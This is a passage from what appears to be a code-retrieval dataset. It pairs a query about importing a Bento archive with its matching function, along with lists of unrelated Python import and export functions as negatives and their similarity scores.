"def export_wells(self, w, title):\r\n self._check_out(title)\r\n np.savez_compressed(os.path.join(self.out_dir, title, title), w)",
"def export_to(self, subdir, filetype='pdf'):\n file = self.partcode + '.' + filetype\n path = self.export_dir.joinpath(subdir).joinpath(file)\n print(str(path))\n self.doc.SaveAs(str(path), True)",
"def to_file(self, name, description, filename):\n self.to_stub(name, description).to_file(filename)",
"def persist_file(tweets, directory):\n log.debug(\"{} tweets to gzipped file\".format(len(tweets)))\n\n filename = join(directory, \"{}.gz\".format(date.today()))\n with gzip.open(filename, \"a+\") as f:\n write(tweets, f)",
"def to_file(self, file_path, smirnoff_data):\n pass",
"def write_file(self, filename, contents):\n blob = self.repo.create_blob(contents)\n self.index.add(pygit2.IndexEntry(filename, blob, pygit2.GIT_FILEMODE_BLOB))",
"def write_xyz_file(allxyz):\n if SAVEXYZ:\n print('+> Saving riverbed topography file...', end='')\n if MODE == 1:\n np.savetxt('kinoshita_topo.xyz', allxyz, fmt='%.6e')\n elif MODE == 2:\n np.savetxt(FNAME.rsplit('.', 1)[0] + '_topo.xyz', allxyz, fmt='%.6e')\n print(' [done]')",
"def exports():"
] | [
"0.60800993",
"0.60314316",
"0.599764",
"0.5991197",
"0.5971901",
"0.59628",
"0.59533924",
"0.5905716",
"0.5669903",
"0.5646166",
"0.5619919",
"0.5599178",
"0.55828655",
"0.5566471",
"0.55654246",
"0.5564186",
"0.5563321",
"0.55614084",
"0.5539148",
"0.55066764",
"0.5496924",
"0.54953384",
"0.5485054",
"0.5478849",
"0.5467897",
"0.54620713",
"0.54524106",
"0.54344577",
"0.5412332",
"0.54115105",
"0.5398005",
"0.5393902",
"0.53891456",
"0.53863394",
"0.5373733",
"0.5369641",
"0.5356247",
"0.53551376",
"0.53316855",
"0.5310304",
"0.5310286",
"0.52957225",
"0.5292685",
"0.52901495",
"0.5288155",
"0.5287477",
"0.52735543",
"0.525905",
"0.5247259",
"0.524327",
"0.5241658",
"0.5235135",
"0.5232922",
"0.52281195",
"0.5227636",
"0.52269846",
"0.52176476",
"0.5208832",
"0.52011317",
"0.5200705",
"0.51920754",
"0.5187802",
"0.51877904",
"0.5183159",
"0.5179211",
"0.51772666",
"0.51756465",
"0.5170228",
"0.5161491",
"0.5157263",
"0.51566875",
"0.51554966",
"0.51502484",
"0.51370054",
"0.51283103",
"0.5124281",
"0.51238596",
"0.5120066",
"0.5118897",
"0.5117707",
"0.5107276",
"0.51037246",
"0.5099288",
"0.50951797",
"0.5094843",
"0.50902444",
"0.5090068",
"0.5087257",
"0.5083099",
"0.50827366",
"0.5077388",
"0.50753033",
"0.50707304",
"0.5066804",
"0.50652045",
"0.50618714",
"0.5059406",
"0.5058343",
"0.50553566",
"0.5054852"
] | 0.73495036 | 0 |
Import a previously exported Bento archive file | def import_bento_(bento_path: str) -> None: # type: ignore (not accessed)
bento = import_bento(bento_path)
logger.info("%s imported.", bento) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def import_idb(self, idb_file):\n self.__run_import_script(file=idb_file, is_bin=False)",
"def zoo_import(name, head=''):\n net = gz.get_model(name, pretrained=True)\n export_block(head + name, net, preprocess=True)",
"def _import_bh_(self):",
"def import_bin(self, bin_file):\n self.__run_import_script(file=bin_file, is_bin=True)",
"def import_fusion_archive(filename, name=\"import\"):\n import_options = app().importManager.createFusionArchiveImportOptions(filename)\n\n document = app().importManager.importToNewDocument(import_options)\n imported_root = document.products[0].rootComponent\n\n bodies = []\n\n for body in imported_root.bRepBodies:\n bodies.append(brep().copy(body))\n for occurrence in imported_root.allOccurrences:\n for body in occurrence.bRepBodies:\n bodies.append(brep().copy(body))\n\n document.close(saveChanges=False)\n\n return BRepComponent(*bodies, name=name)",
"def importer():\n pass",
"def importar2(self):\n self.set_session()\n fileinfo = self.request.files['archivo'][0]\n fname = fileinfo['filename']\n extn = os.path.splitext(fname)[1]\n cname = str(uuid.uuid4()) + extn\n fh = open(\"server/common/resources/uploads/\" + cname, 'wb')\n fh.write(fileinfo['body'])\n fh.close()\n if extn == '.xlsx':\n mee = self.manager2(self.db).import_excel(cname)\n self.respond(message=mee['message'], success=mee['success'])\n else:\n self.respond(message='Formato de Archivo no aceptado¡¡', success=False)\n self.db.close()",
"def do_import(args):\n base64str = b''\n for infile_name in args.infile_names:\n if args.png:\n chunk = subprocess.check_output(['zbarimg', '--raw', infile_name])\n base64str += chunk\n elif args.base64:\n with open(infile_name, 'rb') as infile:\n chunk = infile.read()\n base64str += chunk\n\n raw = base64.b64decode(base64str)\n paperkey = subprocess.Popen(['paperkey', '--pubring', args.pubkey],\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE)\n (paperkey_stdout, _) = paperkey.communicate(raw)\n gpg = subprocess.Popen(['gpg', '--import'], stdin=subprocess.PIPE)\n gpg.communicate(paperkey_stdout)",
"def import_project_dump(self, key):",
"def do_import(export_filename, token):\r\n\r\n print 'Importing %s' % export_filename\r\n url = 'http://shank.trikeapps.com/mediawiki/index.php?title=Special:Import&action=submit'\r\n export_file = open(export_filename, 'rb')\r\n data = {'source': 'upload', 'log-comment': 'migrate_wiki.py script', 'xmlimport': export_file, 'editToken': token }\r\n feed = urllib2.urlopen(url, data)\r\n buf = feed.read()\r\n tree = etree.fromstring(buf, parser)\r\n nodes = tree.xpath('//div[@id=\"bodyContent\"]/p[2]')\r\n if not nodes or not nodes[0].text.startswith('Import finished!'):\r\n raise Exception('Failed to upload file, perhaps export file exceeds max size, try without the --at-once option')",
"def bimport(filepath, resource_path=None, imgi_import=True, imge_import=True, seq_import=True, mov_import=True, txti_import=True, txte_import=True,\r\n script_import=True, img_embed=False, txt_embed=None, skip_sha1=False, img_merge=True):\r\n \r\n filepath = bpy.path.abspath(filepath) #Ensure path is absolute\r\n \r\n if resource_path is None or resource_path.strip() == \"\":\r\n resource_path = None\r\n else:\r\n resource_path = bpy.path.abspath(resource_path) #Ensure path is absolute\r\n \r\n if path.splitext(filepath)[1] == \".blib\":\r\n try:\r\n archive = zf.ZipFile(filepath, 'r')\r\n except zf.BadZipFile:\r\n raise InvalidBlibFile(\"File is not a valid Blender library\")\r\n \r\n blib = True\r\n try:\r\n file_checksum, blibtype, file_version, compatible, *rest = archive.comment.decode(\"utf-8\").split(\" \")\r\n except ValueError:\r\n raise InvalidBlibFile(\"File is broken, missing meta-data\")\r\n \r\n compatible = Version(compatible)\r\n \r\n if blibtype == \"cycles\":\r\n if compatible <= version:\r\n if archive.testzip() is not None:\r\n raise InvalidBlibFile(\"File is broken\")\r\n else:\r\n if not skip_sha1:\r\n checksum = archive_sha1(archive)\r\n \r\n if not file_checksum == checksum.hexdigest():\r\n raise InvalidBlibFile(\"Checksum does not match, file may be broken or have been altered\\n\"\r\n 'Run with \"skip_sha1\" to ignore checksum')\r\n else:\r\n raise BlibVersionError(\"File has incompatible version of blib\")\r\n else:\r\n raise BlibTypeError(\"File is not a valid Cycles material\")\r\n try:\r\n xml_file = archive.open(\"structure.xml\", 'r')\r\n except KeyError:\r\n raise InvalidBlibFile(\"File is broken, missing structure XML\")\r\n tree = ET.ElementTree(file=xml_file)\r\n xml_file.close()\r\n xroot = tree.getroot()\r\n \r\n elif path.splitext(filepath)[1] == \".xml\":\r\n tree = ET.ElementTree(file=filepath)\r\n xroot = tree.getroot()\r\n blib = False\r\n xversion = Version(xroot.attrib[\"compatible\"])\r\n if xversion > version:\r\n raise BlibVersionError(\"File has incompatible version of blib\")\r\n \r\n else:\r\n raise InvalidBlibFile(\"File is not a Blender library\")\r\n \r\n if xroot.tag != \"blib\":\r\n raise InvalidBlibFile(\"File is not a Blender library\")\r\n \r\n if xroot.attrib[\"type\"] != \"cycles\":\r\n raise BlibTypeError(\"File is not a valid Cycles material\")\r\n \r\n failed = {}\r\n imgs = {}\r\n txts = {}\r\n txt_paths = {}\r\n grps = {}\r\n scripts = {}\r\n resources = {\r\n \"images\": imgs,\r\n \"texts\": txts,\r\n \"text_paths\": txt_paths,\r\n \"groups\": grps,\r\n \"scripts\": scripts,\r\n }\r\n txt_dir = ResourceDir(\"texts\", resource_path)\r\n xres = xroot.find(\"resources\")\r\n \r\n #Import resources\r\n if xres is not None:\r\n ximgs = xres.find(\"images\")\r\n xtxts = xres.find(\"texts\")\r\n xgrps = xres.find(\"groups\")\r\n tmp_path = ResourceDir(\"tmp\", resource_path)\r\n path_dict = {}\r\n \r\n #Images\r\n if ximgs is not None and (imgi_import or imge_import or seq_import or mov_import) and blib:\r\n img_dir = ResourceDir(\"images\", resource_path)\r\n hash_dict = None\r\n sfv_update = False\r\n for ximg in ximgs:\r\n if ximg.attrib[\"source\"] in {'FILE', 'GENERATED'}:\r\n if ximg.attrib[\"origin\"] == \"internal\":\r\n if not imgi_import:\r\n pass\r\n else:\r\n if not imge_import:\r\n pass\r\n elif ximg.attrib[\"source\"] == 'SEQUENCE':\r\n if not seq_import:\r\n pass\r\n elif ximg.attrib[\"source\"] == 'MOVIE':\r\n if not mov_import:\r\n pass\r\n \r\n #Write image to temporary folder, and pack in Blender\r\n if 
ximg.attrib[\"source\"] in {'FILE', 'GENERATED'} and (img_embed or (img_embed is None and ximg.attrib[\"origin\"] == \"internal\")):\r\n ipath = extract_image(archive, ximg.attrib[\"path\"], str(tmp_path), path_dict, failed)\r\n if ipath is None:\r\n pass\r\n \r\n try:\r\n img = bpy.data.images.load(ipath)\r\n except:\r\n fail(failed, \"images\", \"import image '{}', unknown reason\".format(ximg.attrib[\"path\"]))\r\n else:\r\n img.source = ximg.attrib[\"source\"]\r\n try:\r\n img.pack()\r\n except:\r\n bpy.data.images.remove(img)\r\n fail(failed, \"images\", \"pack image '{}', unknown reason\".format(ximg.attrib[\"path\"]))\r\n else:\r\n img.filepath = \"\"\r\n imgs[ximg.attrib[\"name\"]] = img\r\n \r\n else: #Write image to resource folder, and load in Blender\r\n if img_merge and ximg.attrib[\"source\"] != 'SEQUENCE': #Use existing image in resources if available\r\n try:\r\n comment = archive.getinfo(ximg.attrib[\"path\"]).comment.decode(\"utf-8\")\r\n except KeyError:\r\n fail(failed, \"images\", \"import image '{}', file is missing\".format(ximg.attrib[\"path\"]))\r\n pass\r\n \r\n com_path = path_dict[comment] if comment != \"\" else \"\"\r\n com_name = path.basename(path.dirname(com_path))\r\n if comment != \"\" and com_name != \"tmp\":\r\n ipath = com_path\r\n path_dict[ximg.attrib[\"path\"]] = ipath\r\n else:\r\n #Create hash dictionary only in the first iteration\r\n if hash_dict is None:\r\n hash_path = path.join(img_dir.root, \"list.sfv\")\r\n hash_dict = {}\r\n if path.isfile(hash_path):\r\n sfv = re.compile(r\"(.*) (.*?)$\")\r\n hash_file = open(hash_path, 'r', encoding=\"utf-8\")\r\n for line in hash_file:\r\n key = sfv.sub(r\"\\2\", line).strip()\r\n val = sfv.sub(r\"\\1\", line).strip()\r\n if key in hash_dict and val in hash_dict[key]:\r\n sfv_update = True\r\n else:\r\n hash_dict.setdefault(key, []).append(val)\r\n hash_file.close()\r\n hash_bkp = hash_dict.copy()\r\n \r\n #Check if files match and set path to appropriate image\r\n img_path = ximg.attrib[\"path\"] if comment == \"\" else comment\r\n try:\r\n crc = format(archive.getinfo(img_path).CRC, 'x')\r\n except KeyError:\r\n fail(failed, \"images\", \"import image '{}', file is missing\".format(ximg.attrib[\"path\"]))\r\n pass\r\n \r\n if crc in hash_dict:\r\n i = 0\r\n while i < len(hash_dict[crc]):\r\n val = hash_dict[crc][i]\r\n fpath = path.join(img_dir.root, val)\r\n if path.isfile(fpath):\r\n fsize = path.getsize(fpath)\r\n zsize = archive.getinfo(img_path).file_size\r\n if fsize == zsize:\r\n ffile = open(fpath, 'rb')\r\n zfile = archive.open(img_path, 'r')\r\n if files_equal(ffile, zfile):\r\n ipath = fpath\r\n path_dict[ximg.attrib[\"path\"]] = ipath\r\n ffile.close()\r\n zfile.close()\r\n break\r\n ffile.close()\r\n zfile.close()\r\n else:\r\n hash_dict[crc].remove(val)\r\n i -= 1\r\n i += 1\r\n else:\r\n ipath = extract_image(archive, ximg.attrib[\"path\"], str(img_dir), path_dict, failed)\r\n if ipath is None:\r\n pass\r\n \r\n hash_dict[crc].append(path.relpath(ipath, img_dir.root))\r\n else:\r\n ipath = extract_image(archive, ximg.attrib[\"path\"], str(img_dir), path_dict, failed)\r\n if ipath is None:\r\n pass\r\n \r\n hash_dict[crc] = [path.relpath(ipath, img_dir.root)]\r\n else: #Use image in archive, even if duplicate\r\n if ximg.attrib[\"source\"] == 'SEQUENCE':\r\n seq_dir = path.dirname(ximg.attrib[\"path\"])\r\n dir_name = ximg.attrib[\"path\"].split(\"/\")[-2]\r\n seq_path = path.join(str(img_dir), dir_name)\r\n makedirs(seq_path)\r\n seq_imgs = [img for img in archive.namelist() if 
img.startswith(seq_dir)]\r\n for img in seq_imgs:\r\n i_tmp_path = extract_image(archive, img, seq_path, path_dict, failed)\r\n if img == ximg.attrib[\"path\"]:\r\n ipath = i_tmp_path\r\n if ipath is None:\r\n break\r\n if ipath is None:\r\n rmtree(seq_path)\r\n pass\r\n else:\r\n ipath = extract_image(archive, ximg.attrib[\"path\"], str(img_dir), path_dict, failed)\r\n if ipath is None:\r\n pass\r\n \r\n #load image to Blender\r\n try:\r\n img = bpy.data.images.load(ipath)\r\n except:\r\n fail(failed, \"images\", \"import image '{}', unknown reason\".format(ximg.attrib[\"path\"]))\r\n else:\r\n img.source = ximg.attrib[\"source\"]\r\n imgs[ximg.attrib[\"name\"]] = img\r\n \r\n if tmp_path:\r\n for item in listdir(str(tmp_path)):\r\n fpath = path.join(str(tmp_path), item)\r\n if path.isfile(fpath):\r\n remove(fpath)\r\n \r\n #Update hash file if list has changed\r\n if hash_dict is not None and (hash_dict != hash_bkp or sfv_update):\r\n hash_path = path.join(img_dir.root, \"list.sfv\")\r\n hash_file = open(hash_path, 'w', encoding=\"utf-8\")\r\n for key in hash_dict:\r\n for val in hash_dict[key]:\r\n hash_file.write(val + \" \" + key + \"\\n\")\r\n hash_file.close()\r\n \r\n #Texts\r\n if xtxts is not None and (txti_import or txte_import):\r\n for xtxt in xtxts:\r\n if xtxt.attrib[\"origin\"] == \"internal\":\r\n if txti_import:\r\n if \"path\" in xtxt.attrib:\r\n if blib:\r\n if txt_embed == False:\r\n import_texts(\"zip\", \"ext\", xtxt, txts, failed, archive, txt_dir)\r\n else:\r\n import_texts(\"zip\", \"int\", xtxt, txts, failed, archive, txt_dir)\r\n else:\r\n if txt_embed == False:\r\n import_texts(\"xml\", \"ext\", xtxt, txts, failed, None, txt_dir)\r\n else:\r\n import_texts(\"xml\", \"int\", xtxt, txts, failed, None, txt_dir)\r\n \r\n else:\r\n if txte_import:\r\n if \"path\" in xtxt.attrib:\r\n if blib:\r\n if txt_embed == True:\r\n import_texts(\"zip\", \"int\", xtxt, txts, failed, archive, txt_dir, txt_paths)\r\n else:\r\n import_texts(\"zip\", \"ext\", xtxt, txts, failed, archive, txt_dir, txt_paths)\r\n else:\r\n if txt_embed == True:\r\n import_texts(\"xml\", \"int\", xtxt, txts, failed, None, txt_dir, txt_paths)\r\n else:\r\n import_texts(\"xml\", \"ext\", xtxt, txts, failed, None, txt_dir, txt_paths)\r\n \r\n #Groups\r\n if xgrps is not None:\r\n for xgrp in xgrps:\r\n xnodes = xgrp.find(\"nodes\")\r\n xlinks = xgrp.find(\"links\")\r\n grp = bpy.data.node_groups.new(xgrp.attrib[\"name\"], xgrp.attrib[\"bl_idname\"])\r\n grps[xgrp.attrib[\"name\"]] = grp\r\n if xnodes is not None:\r\n build_tree(xnodes, xlinks, grp, resources, txt_embed, txt_dir, blib, script_import, archive, failed)\r\n \r\n #Import material\r\n xmat = xroot.find(\"main\")\r\n \r\n if xmat is not None:\r\n xcycles = xmat.find(\"cycles_settings\")\r\n xnodes = xmat.find(\"nodes\")\r\n xlinks = xmat.find(\"links\")\r\n \r\n mat = bpy.data.materials.new(xmat.attrib[\"name\"])\r\n set_attributes(mat, xmat, failed)\r\n set_attributes(mat.cycles, xcycles, failed)\r\n mat.use_nodes = True\r\n mat.node_tree.nodes.clear()\r\n build_tree(xnodes, xlinks, mat.node_tree, resources, txt_embed, txt_dir, blib, script_import, archive, failed)\r\n if blib:\r\n archive.close()\r\n for f in failed:\r\n print(\"{} {} failed to be imported/assigned.\".format(failed[f], f))\r\n return mat\r\n else:\r\n if blib:\r\n archive.close()\r\n for f in failed:\r\n print(\"{} {} failed to be imported/assigned.\".format(failed[f], f))\r\n return grp",
"def importar(self):\n self.set_session()\n fileinfo = self.request.files['archivo'][0]\n fname = fileinfo['filename']\n extn = os.path.splitext(fname)[1]\n cname = str(uuid.uuid4()) + extn\n fh = open(\"server/common/resources/uploads/\" + cname, 'wb')\n fh.write(fileinfo['body'])\n fh.close()\n if extn == '.xlsx':\n mee = self.manager(self.db).import_excel(cname)\n self.respond(message=mee['message'], success=mee['success'])\n else:\n self.respond(message='Formato de Archivo no aceptado¡¡', success=False)\n self.db.close()",
"def importar3(self):\n self.set_session()\n fileinfo = self.request.files['archivo'][0]\n fname = fileinfo['filename']\n extn = os.path.splitext(fname)[1]\n cname = str(uuid.uuid4()) + extn\n print(\"flacoooo\")\n print(str(datetime.now()))\n fh = open(\"server/common/resources/uploads/\" + cname, 'wb')\n fh.write(fileinfo['body'])\n fh.close()\n print(\"end flacooo\")\n print(str(datetime.now()))\n if extn == '.xlsx':\n mee = self.manager3(self.db).import_excel(cname)\n self.respond(message=mee['message'], success=mee['success'])\n else:\n self.respond(message='Formato de Archivo no aceptado¡¡', success=False)\n self.db.close()",
"def action_import(self):\n ctx = self._context\n \n data = base64.b64decode(self.data)\n file_input = cStringIO.StringIO(data)\n file_input.seek(0)\n reader_info = []\n if self.delimeter:\n delimeter = str(self.delimeter)\n else:\n delimeter = ','\n reader = csv.reader(file_input, delimiter=delimeter,\n lineterminator='\\r\\n')\n try:\n reader_info.extend(reader)\n except Exception:\n raise exceptions.Warning(_(\"Not a valid file!\"))\n keys = reader_info[0]",
"def importar4(self):\n self.set_session()\n fileinfo = self.request.files['archivo'][0]\n fname = fileinfo['filename']\n extn = os.path.splitext(fname)[1]\n cname = str(uuid.uuid4()) + extn\n fh = open(\"server/common/resources/uploads/\" + cname, 'wb')\n fh.write(fileinfo['body'])\n fh.close()\n if extn == '.xlsx':\n mee = self.manager4(self.db).import_excel(cname)\n self.respond(message=mee['message'], success=mee['success'])\n else:\n self.respond(message='Formato de Archivo no aceptado¡¡', success=False)\n self.db.close()",
"def action_import(self):\n ctx = self._context\n account_obj = self.env[\"account.account\"]\n import_obj = self.env['import.journal.entries.advanced']\n import_line_obj = self.env[\"journal.entries.csv.import\"]\n if 'active_id' in ctx:\n import_id = import_obj.browse(ctx['active_id'])\n if not self.data:\n raise exceptions.Warning(_(\"Necesitas seleccionar un archivo!\"))\n # Decode the file data\n data = base64.b64decode(self.data).decode('utf-8')\n file_input = StringIO(data)\n file_input.seek(0)\n reader_info = []\n if self.delimeter:\n delimeter = str(self.delimeter)\n else:\n delimeter = ','\n reader = csv.reader(file_input, delimiter=delimeter,\n lineterminator='\\r\\n')\n try:\n reader_info.extend(reader)\n except Exception:\n raise exceptions.Warning(_(\"Archivo no valido\"))\n keys = reader_info[0]\n # check if keys exist\n if not isinstance(keys, list) or ('cuenta' not in keys):\n raise exceptions.Warning(_(\"No se encuentran 'cuentas' contable en el archivo\"))\n del reader_info[0]\n values = {}\n actual_date = fields.Date.today()\n for i in range(len(reader_info)):\n val = {}\n field = reader_info[i]\n values = dict(zip(keys, field))\n account = False\n if 'cuenta' in values and values['cuenta']:\n account_id = account_obj.search([('code', '=', values['cuenta'])]) \n if account_id:\n account = account_id[0]\n else:\n account = account_id\n\n val[\"ref\"] = values[\"descripcion\"]\n val[\"document_number\"] = values[\"num_documento\"]\n val[\"document_date\"] = datetime.strptime(values[\"fecha\"] , \"%d-%m-%Y\")\n val['account_id'] = account.id\n val['parent_id'] = import_id.id\n val['debit'] = values['debito']\n val['credit'] = values['credito']\n val['processed'] = False\n validate = import_line_obj.create(val)\n if validate:\n if validate.account_id:\n validate.is_ok = True",
"def AgiImport(dirpath, file):\n objPath=dirpath+'\\\\'+file\n if os.path.exists(objPath)==False:\n print objPath\n return\n \n ## Open new template file ##\n template = rs.TemplateFile()\n cmd=\"-_New \"\n cmd+=template+\" \"\n rs.Command(cmd)\n \n \n cmd=\"-_Import \"\n cmd+='\"'+os.path.abspath(objPath)+'\"'+\" \"\n cmd+=\"IgnoreTextures=No \"\n cmd+=\"MapOBJToRhinoZ=Yes \"\n cmd+=\"_Enter \"\n rs.Command(cmd)\n \n rs.Command(\"SplitDisjointMesh \")\n \n meshes = rs.LastCreatedObjects()\n max=0\n keep=None\n for guid in meshes:\n mesh = rs.coercemesh(guid)\n count = mesh.Faces.Count\n if count > max:\n keep = guid\n max = count\n \n if keep:\n meshes.remove(keep)\n rs.DeleteObjects(meshes)\n \n rs.ZoomExtents(all=True)\n \n cmd=\"-_SaveAs \"\n cmd+=\"SaveTextures=Yes \"\n cmd+='\"'+os.path.abspath(objPath).replace(\".wrl\",\".3dm\")+'\"'+\" \"\n cmd+=\"_Enter \"\n rs.Command(cmd)\n rs.DocumentModified(False)\n Rhino.RhinoApp.Wait()\n Rhino.RhinoApp.Wait()",
"def importExternal(*args):\n goTo = pi.currentProject\n impFile = cmds.fileDialog2(fm=1, dir = goTo)[0]\n if impFile:\n cmds.file(impFile, i=True)",
"def importObject(portal, file_name):\n try:\n portal.manage_importObject(file_name)\n except:\n portal._p_jar = portal.Destination()._p_jar\n portal.manage_importObject(file_name)",
"def export(bento_tag: str, out_path: str) -> None: # type: ignore (not accessed)\n bento = bento_store.get(bento_tag)\n out_path = bento.export(out_path)\n logger.info(\"%s exported to %s.\", bento, out_path)",
"def action_import(self):\n ctx = self._context\n attachment_obj = self.env['ir.attachment']\n invoice_obj = self.env['account.invoice']\n storage = attachment_obj._storage()\n filestore = attachment_obj._filestore()\n file_gc = attachment_obj._file_gc()\n indir = self.name#+'/E-Faktur'\n files_in_dir = os.listdir(indir)\n in_dir = []\n for x in files_in_dir:\n r = open(indir+\"/\"+x,'rb').read().encode('base64')\n _logger.info(\"_read_file reading %s\", x)\n if len(x) == 67:\n #_logger.info(\"_read_file valid file efaktur %s\", x)\n faktur_pajak = x.split(\"-\")\n #SEARCH INVOICE YG SUDAH TERFALIDASI DAN ADA FAKTUR PAJAK\n invoice_ids = invoice_obj.search([('nomor_faktur_id','!=',None),('move_id','!=',None),('nomor_faktur_id.number','ilike',faktur_pajak[1][8:])])\n #CARI APAKAH SUDAH TERATTACHMENT DI SISTEM\n attachment_ids = attachment_obj.search([('datas','!=',r),('res_id','in',invoice_ids.ids),('res_model','=','account.invoice'),('name','=',faktur_pajak[1])])\n if not attachment_ids and invoice_ids:\n for invoice in invoice_ids:\n values = {\n 'res_model': 'account.invoice',\n 'company_id': 1,\n 'res_name': invoice.number,#NOMOR INVOICE\n 'datas_fname': x,#NAMA FILE\n 'type': 'binary',\n 'res_id': invoice.id,\n 'name': x,#faktur_pajak[1],\n 'mimetype': 'application/pdf',\n 'store_fname': 'E-Faktur/'+x,\n 'datas': r,\n }\n attachment_obj.create(values)\n _logger.info(\"_uploaded_file %s\", x)",
"def import_file(filename):\n if not os.path.exists(filename): return 0\n if zipfile.is_zipfile(filename):\n infp = zipfile.ZipFile(filename)\n elif tarfile.is_tarfile(filename):\n infp = tarfile.TarFile(filename)\n else: # regular file\n infp = RegFile(filename)\n name_list =infp.namelist()\n director = {}\n VALUES = {} \n if \"USERNAME\" in os.environ:\n VALUES[\"USER\"] = os.environ[\"USERNAME\"] # NameId\n if \"HOMEPATH\" in os.environ:\n VALUES[\"HOME\"] = 'C:' + os.sep + os.environ[\"HOMEPATH\"]\n if \"HOME\" in os.environ:\n VALUES[\"HOME\"] = os.environ[\"HOME\"]\n if \"USERPROFILE\" in os.environ:\n VALUES[\"HOME\"] = os.environ[\"USERPROFILE\"]\n globalspath, f = myro.globvars.__file__.rsplit(os.sep, 1)\n #print \"globalspath:\", globalspath\n myropath, f = globalspath.rsplit(os.sep, 1)\n #print \"myropath:\", myropath\n sitepath, f = myropath.rsplit(os.sep, 1)\n #print \"sitepath:\", sitepath\n myroparts = myropath.split(os.sep)\n pythonpath = myroparts[0] + os.sep + myroparts[1]\n VALUES[\"DESKTOP\"] = VALUES[\"HOME\"] + os.sep + \"DESKTOP\" \n VALUES[\"PYTHONDIR\"] = pythonpath\n VALUES[\"MYRODIR\"] = myropath\n VALUES[\"PYTHONSITEDIR\"] = sitepath\n VALUES[\"PYTHONDIR\"] = pythonpath\n install_count = 0\n if \"MANIFEST\" in name_list:\n manifest = infp.read(\"MANIFEST\")\n lines = manifest.split(\"\\n\")\n for line in lines:\n if \":\" in line:\n f, dest = map(string.strip, line.strip().split(\":\"))\n director[f] = dest % VALUES\n for name in name_list:\n if name == \"MANIFEST\": continue\n contents = infp.read(name)\n print \" writing:\", director[name], \"...\"\n # first write to temp file:\n try:\n outfp = open(director[name], \"wb\")\n except:\n makePath(director[name])\n outfp = open(director[name], \"wb\")\n outfp.write(contents)\n outfp.close()\n install_count += 1\n else:\n print \" ERROR: no MANIFEST in Myro upgrade; skipping\"\n infp.close()\n return install_count",
"def import_from_file(jamsite, source='jammers.csv', fieldnames=None):\n\t# import jammers.csv\n\twith open(source) as csvfile:\n\t\tjamsite.mergeinsert( import_jammers(csvfile, fieldnames=fieldnames) )",
"def importar5(self):\n self.set_session()\n fileinfo = self.request.files['archivo'][0]\n fname = fileinfo['filename']\n extn = os.path.splitext(fname)[1]\n cname = str(uuid.uuid4()) + extn\n fh = open(\"server/common/resources/uploads/\" + cname, 'wb')\n fh.write(fileinfo['body'])\n fh.close()\n if extn == '.xlsx':\n mee = self.manager5(self.db).import_excel(cname)\n self.respond(message=mee['message'], success=mee['success'])\n else:\n self.respond(message='Formato de Archivo no aceptado¡¡', success=False)\n self.db.close()",
"def doImport(self,textFile):\n self.loadText(textFile)\n self.getBooks()\n #self.copyBooks()\n self.genLibData()\n self.genLibCells()\n self.sortRecords()",
"def _CMD_IMPORT(self, file_name):\n # reset inspector:\n # self.inspector = DataInspectorRecord()\n\n ext = file_name.split('.')[-1]\n if ext == 'mat':\n # self.model.from_json_dict(buff)\n self.model.from_mat_file(file_name)\n\n elif ext == 'json':\n buff = ''\n with open(file_name, 'rb') as f:\n buff = f.read()\n model = json.loads(buff)\n self.model.from_json_dict(model)\n\n else:\n raise DataExplorerError('Unsupported file format: {}'.format(ext))\n\n # update initial selection - first row:\n if len(self.model.data_list) > 0:\n self.handle_row_select([self.model.data_list[0]])",
"def importIntoFile(filename, outputFile):\n\t#grab contents of current file\n\tcurrFile = open(filename).read().splitlines()\n\n\t#export file\n\twFile = open(outputFile, 'w+')\n\n\tprint \"\\tImporting into \" + outputFile + \":\\n\\t\\t\",\n\n\t#parse and write\n\tskipWrite = False\n\tspaceAppend = \"\"\n\tfor line in currFile:\n\t\tif line.find(importStrL) != -1:\n\t\t\tskipWrite = True\n\t\t\twFile.write(line)\n\t\t\t#handling indentation and space consistency\n\t\t\tif re.match(r\"\\s+\", line) == None:\n\t\t\t\tspaceAppend = \"\"\n\t\t\telse:\n\t\t\t\tspaceAppend = re.match(r\"\\s+\", line).group()\n\t\t\tline = line.replace(importStrL, \"\").replace(importStrR, \"\").strip()\n\t\t\twFile.write('\\n')\n\t\t\t#import lines, matching indentation\n\t\t\tfor importLine in cactusImports[line]:\n\t\t\t\twFile.write(spaceAppend + importLine + '\\n')\n\t\t\tprint line,\n\t\telse:\n\t\t\tif line.find(endStr) != -1:\n\t\t\t\tskipWrite = False\n\t\t\tif not skipWrite:\n\t\t\t\twFile.write(line+'\\n')\n\tprint '\\n'\n\twFile.close()",
"def manual_import_genesis(self, path):\n dtu = DtuLoader.DtuLoader(path)\n fbx_path = dtu.get_fbx_path()\n self.genesis_import(fbx_path, dtu)",
"def file_import(self):\r\n\r\n try:\r\n self.process_file_import()\r\n except InputError as ex:\r\n print(ex)\r\n self.file_import()",
"def _add_demo_import(self):\r\n # add out completed one\r\n q = ImportQueue(\r\n username=u'admin',\r\n file_path=u'testing.txt'\r\n )\r\n DBSession.add(q)\r\n transaction.commit()\r\n return",
"def import_click(self):\n path = self.path.get()\n if not path:\n self.error_label.config(text='Alege baza de date.')\n return\n\n password = self.pass_entry.get()\n if not password:\n self.error_label.config(text='Introdu parola.')\n return\n\n try:\n sharing.import_database(self.us, path, password)\n self.error_label.config(text='Am importat baza de date cu succes.')\n except InvalidToken:\n self.error_label.config(text='Parolă incorectă.')",
"def import_module(self, location, name):",
"def import_diff(diff_path, state_download_path, config):\n logging.info(\"Importing with imposm\")\n imposm_config_path = config[\"imposm_config_path\"]\n subprocess.call([\"imposm3\", \"diff\", \"--config=%s\" % imposm_config_path, diff_path])",
"def convert_placards():\n\n local('cd import_scripts;../bin/python import_placards.py import')",
"def step_3b(browser):\n xml_file = '../../src/imio.project.pst/src/imio/project/pst/model/PST_eComptes_Export_201805V1.xsd'\n # select xml file\n file_field = browser.find(u'Document XML exporté depuis eComptes')\n with open(xml_file, 'r') as f:\n file_field.set('value', (f.read(), 'ecomptes_pst.xml'))\n # import xml file\n browser.find_button_by_label('Importer').click()\n # write browser contents\n # with open('browser_contents', 'w') as f:\n # f.write(browser.contents)",
